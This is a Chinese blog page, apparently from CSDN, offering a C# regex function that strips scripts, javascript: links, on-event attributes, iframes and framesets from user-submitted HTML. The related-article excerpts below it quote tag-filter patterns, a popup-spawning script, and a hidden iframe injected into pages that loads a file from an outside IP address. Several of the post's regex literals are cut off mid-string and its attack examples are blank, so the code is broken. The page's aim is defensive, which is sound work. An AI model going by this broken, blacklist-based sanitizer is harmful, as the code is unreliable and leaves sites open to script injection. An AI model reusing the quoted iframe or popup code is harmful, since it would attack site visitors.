网页恶意代码html,正则表达式过滤HTML危险脚本

最新推荐文章于 2023-06-22 14:58:28 发布
最新推荐文章于 2023-06-22 14:58:28 发布
阅读量315 收藏
点赞数
文章标签: 网页恶意代码html

在做一些网站(特别是bbs之类)时,经常会有充许用户输入html样式代码,却禁止脚本的运行的需求, 以达到丰富网页样式,禁止恶意代码的运行。

当然不能用 htmlencode 和 htmldecode 方法,因为这样连基本的html代码会被禁止掉。

我在网上搜索,也没有找到好的解决办法,倒是收集了一些脚本攻击的实例:

1.

2.

3. 其它基本控件的 on...事件中的代码

4. iframe 和 frameset 中载入其它页面造成的攻击

有了这些资料后,事情就简单多了,写一个简单的方法,用正则表达式把以上符合几点的代码替换掉:

public string wipescript(string html)

{

system.text.regularexpressions.regex regex1 = new system.text.regularexpressions.regex(@"

system.text.regularexpressions.regex regex2 = new system.text.regularexpressions.regex(@" href *= *[\s\s]*script *:",system.text.regularexpressions.regexoptions.ignorecase);

system.text.regularexpressions.regex regex3 = new system.text.regularexpressions.regex(@" on[\s\s]*=",system.text.regularexpressions.regexoptions.ignorecase);

system.text.regularexpressions.regex regex4 = new system.text.regularexpressions.regex(@"",system.text.regularexpressions.regexoptions.ignorecase);

system.text.regularexpressions.regex regex5 = new system.text.regularexpressions.regex(@"

",system.text.regularexpressions.regexoptions.ignorecase);

html = regex1.replace(html, ""); //过滤标记

html = regex2.replace(html, ""); //过滤href=javascript: (

html = regex3.replace(html, " _disibledevent="); //过滤其它控件的on...事件

html = regex4.replace(html, ""); //过滤iframe

html = regex5.replace(html, ""); //过滤frameset

return html;

}

此方法输入可能包含脚本的html代码,返回则就是干净的代码了。

迷影生活
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP使用正则表达式实现过滤非法字符串功能示例
10-18
本示例主要展示了如何使用PHP的正则表达式功能来过滤非法字符串,特别是针对留言板数据提交的情况,防止恶意用户输入可能破坏系统或者安全的数据。 首先,我们需要了解PHP中的`preg_replace`函数。`preg_replace`是...
通过正则表达式过滤html标签
weixin_53731501的博客
06-14 2133
通过正则表达式过滤html标签
网络安全实验九 恶意代码实验
qq_64314976的博客
06-22 1167
为结束IE浏览器中不停打开的网易主页,通过选中“进程”选项卡,选中“IEXPLORE.EXE”,点击“结束进程”。为结束IE浏览器中不停打开的网易主页,通过选中“进程”选项卡,选中“IEXPLORE.EXE”,点击“结束进程”。进入“我的电脑”,点击工具→文件夹选项,进入文件夹选项窗口,选中“查看”选项卡,将“隐藏已知文件类型的扩展名”签名的勾去掉,并点击“确定”。进入“我的电脑”,点击工具→文件夹选项,进入文件夹选项窗口,选中“查看”选项卡,将“隐藏已知文件类型的扩展名”签名的勾去掉,并点击“确定”。
html自动添加恶意代码,HTML恶意代码
weixin_30418225的博客
05-30 780
利用网页进行攻击是非常难以防范的,目前尚没有什么特别有效的方法可以防范,如果有,也要以牺牲很多功能作为代价。所谓恶意网页主要是利用软件或系统操作平台等的安全漏洞,通过执行嵌入网页H T M L超文本标记语言内的Java Applet小应用程序,JavaScript脚本语言程序,ActiveX控件部件等可自动执行的代码程序,强行修改用户操作系统的注册表设置及系统实用配置程序,或非法控制系统资源盗取...
html恶意代码原理,HTML恶意代码
weixin_39939665的博客
06-03 794
很难阻止使用网页进行攻击. 当前,没有特别有效的方法来防止它. 如果这样做,它还必须牺牲很作为代价.所谓的恶意网页主要被软件或系统操作平台安全漏洞所利用,并且可以通过执行嵌入HTML超文本标记语言中的Java Applet小程序,JavaScript脚本程序,ActiveX控件等来自动执行. 网页代码程序,强行修改用户操作系统的注册表设置和系统实用配置程序,或非法控制系统资源来窃取用户文件,或恶...
过滤多余html语言,php过滤危险html代码的方法
weixin_36359107的博客
05-30 201
php过滤危险html代码的方法用PHP过滤html里可能被利用来引入外部危险内容的代码。有些时候,需要让用户提交html内容,以便丰富用户发布的信息,当然,有些可能造成显示页面布局混乱的代码也在过滤范围内。以下是小编为大家搜索整理的php过滤危险html代码的方法,希望能给大家带来帮助!更多精彩内容请及时关注我们应届毕业生考试网!以下是引用片段:#用户发布的html,过滤危险代码function...
php过滤引入外部危险html代码
云博客_资源宝分享
07-09 435
用PHP过滤html里可能被用来引入外部危险内容的代码。 #过滤危险代码 function uh($str) { $farr = array( "/s+/", //过滤多余的空白 "/<(/?)(script|i?frame|style|html|body|title|link|meta|?|%)([^>]*?)>/isU", //过滤 <script 等可能引入恶意内容或恶意改变显示布局的代码,如果不需要插入flash等,还可以加入<object的过滤 "/(&l
正则表达式 正则表达式过滤脚本的一些研究
08-01
正则表达式过滤脚本的一些研究(asp.net+C#)在做一些网站(特别是BBS之类)时,经常会有充许用户输入html样式代码,却禁止脚本的运行的需求, 以达到丰富网页样式,禁止恶意代码的运行。 当然不能用 HtmlEncode 和 ...
asp正则表达式各种过滤函数.pdf
10-20
oseObjectTag(ContentStr) Dim ClsTempLoseStr,regEx ...通过使用正则表达式进行过滤,可以有效地防止潜在的恶意代码执行,提高网站的安全性。同时,它们也可以用于格式化或标准化HTML内容,使其符合特定的需求或标准。
正则表达式
06-13
确保对用户输入进行严格的验证和过滤,避免执行恶意代码。 9. **正则表达式测试工具**:利用在线正则表达式测试工具(如Regex101或RegExr)可以帮助开发者调试和测试正则表达式,确保它们按预期工作。 10. **性能...
HTML恶意代码的实验步骤.pdf
07-11
HTML恶意代码的实验步骤.pdf 学习资料 复习资料 教学资源
用php过滤危险html代码的函数
10-30
然而,这种灵活性也带来了安全隐患,因为用户提交的HTML代码可能会包含恶意脚本或元素,如JavaScript事件触发、iframe嵌入等,这些都可能导致跨站脚本(XSS)攻击或者破坏页面布局。因此,对用户提交的HTML内容...
html自动添加恶意代码,过滤html恶意代码
weixin_36040444的博客
05-30 138
/*** 转义HTML特殊字符*/public static final String trunhtml(String html){if(html == null)return null;final StringBuilder newhtml = new StringBuilder("");final char[] chararray = html.toCharArray();for(char c...
恶意html代码
KarlDoenitz的专栏
08-09 3232
第一步:把如下代码加入 区域中 <!---hide--- function pop(){ for(i=1;i<=3;i++){ window.open('icq.htm','','width=400,height=460','status=off','location=off','toolbar=off','scrollbars
html注册xss防注入代码,防止恶意代码注入XSS(cross site scripting)
weixin_33504929的博客
06-09 235
防止恶意代码注入XSS(cross site scripting)发布时间:2020-06-05 10:32:55来源:51CTO阅读:570作者:津沙港湾栏目:数据库Login.PHP页面html>登录页面用户名密码LoginController.PHP页面html>登录验证//接收用户提交的用户名和密码(login.php页面提交的参数)$username=$_REQUEST[...
Web渗透(二)HTML注入知识整理
weixin_39157582的博客
08-23 5692
HTML注入知识整理1、什么是HTML注入2、HTML注入类型3、漏洞挖掘4、修复建议 1、什么是HTML注入 HTML注入有时也被称为虚拟污染。这实际是一个由站点造成的攻击,该站点允许恶意用户向其Web页面注入HTML,并且没有合理处理用户输入。换句话说,HTML注入漏洞是由网站接收HTML引起的,一般出现在网站页面的表单输入。 由于HTML是用于定义网页结构的语言,如果攻击者可以注入HTML,它们基本上可以改变浏览器呈现的内容。有时,这可能会导致页面外观的完全改变,或在其他情况下,创建表单来欺骗用户。例
网页设计的代码中被插入了恶意代码
weixin_33845477的博客
10-22 469
      一个非常奇怪的现象,在我电脑中所有的网页文件(html,asp,aspx等等)在最后几行都被加入了以下代码: &lt;iframe src="http://222.208.183.246/htm/jh.htm" width="0" height="0" frameborder="0"&gt;&lt;/iframe&gt; &lt;script src="http:
html注入跨站攻击脚本,跨站脚本攻击(XSS)
weixin_39888180的博客
06-23 1839
跨站脚本攻击(XSS)是一种客户端代码注入攻击。攻击者通过在合法的网页中注入恶意代码,达到在受害者的浏览器中执行恶意代码的目的。当受害者访问执行恶意代码网页时,攻击就开始了。这些网页成为了将恶意代码发送到用户浏览器的工具。通常受到跨站脚本攻击的网页包括论坛、留言板以及可以评论的网页。如果网页将用户的原始输入作为网页内容,那么它很容易受到 XSS 攻击,因为这类用户输入一定会被受害者的浏览器解析。...
防止xss和sql注入:js特殊字符过滤正则
最新发布
11-10
防止XSS(跨站脚本攻击)和SQL注入是开发者需要注意的安全问题。其中,JS特殊字符过滤正则可以作为一种方法来防止XSS攻击。 XSS攻击是指攻击者通过注入恶意脚本代码,使目标网站在用户浏览时执行这些脚本,从而达到攻击目的。为了防止XSS攻击,开发者可以使用JS特殊字符过滤正则表达式过滤用户输入的数据。这个正则表达式可以识别并替换掉一些特殊字符,如<, >, &, ", '等。这样就可以防止用户输入的数据被误认为是HTML或JavaScript代码,并在网页中执行。 SQL注入则是指攻击者通过在用户输入的数据中注入恶意的SQL代码,从而对数据库进行非法操作或获取敏感信息。为了防止SQL注入,开发者需要对用户输入的数据进行严格的过滤和转义。可以使用JS特殊字符过滤正则表达式过滤用户输入的数据,避免特殊字符被误认为是SQL代码的一部分,从而防止注入攻击的发生。 需要注意的是,JS特殊字符过滤正则表达式只是防止XSS和SQL注入的一种方式,而并非全面解决这些安全问题的方法。开发者还应结合其他安全措施,如限制用户输入的长度和类型、使用参数化查询等,来提高系统的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值